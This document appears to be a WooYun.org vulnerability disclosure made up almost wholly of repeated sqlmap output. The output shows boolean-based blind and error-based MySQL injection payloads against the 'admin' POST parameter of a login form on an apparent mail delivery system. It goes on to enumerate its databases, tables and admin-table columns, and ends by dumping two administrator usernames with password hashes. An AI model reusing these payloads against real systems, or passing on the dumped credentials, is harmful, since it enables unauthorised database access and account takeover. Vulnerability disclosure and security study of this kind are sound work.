WooYun.org

sqlmap identified the following injection points with a total of 198 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
[13 tables]
+---------------------------------------+
| domain                                |
| user                                  |
| admin                                 |
| config                                |
| defer                                 |
| deliverlog                            |
| erruser                               |
| eventlog                              |
| ipdata                                |
| mailserver                            |
| proclog                               |
| queue                                 |
| total                                 |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
Table: admin
[8 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| date     | datetime         |
| no       | int(11) unsigned |
| admin    | varchar(64)      |
| descp    | varchar(100)     |
| disabled | char(2)          |
| flag     | char(2)          |
| ip       | varchar(100)     |
| passwd   | varchar(32)      |
+----------+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
Table: admin
[2 entries]
+---------+----------------------------------+
| admin   | passwd                           |
+---------+----------------------------------+
| admin   | $1$655765$t1uDwWFXaeykAb0zQtlLm/ |
| anytest | anb1arfj9f85U                    |
+---------+----------------------------------+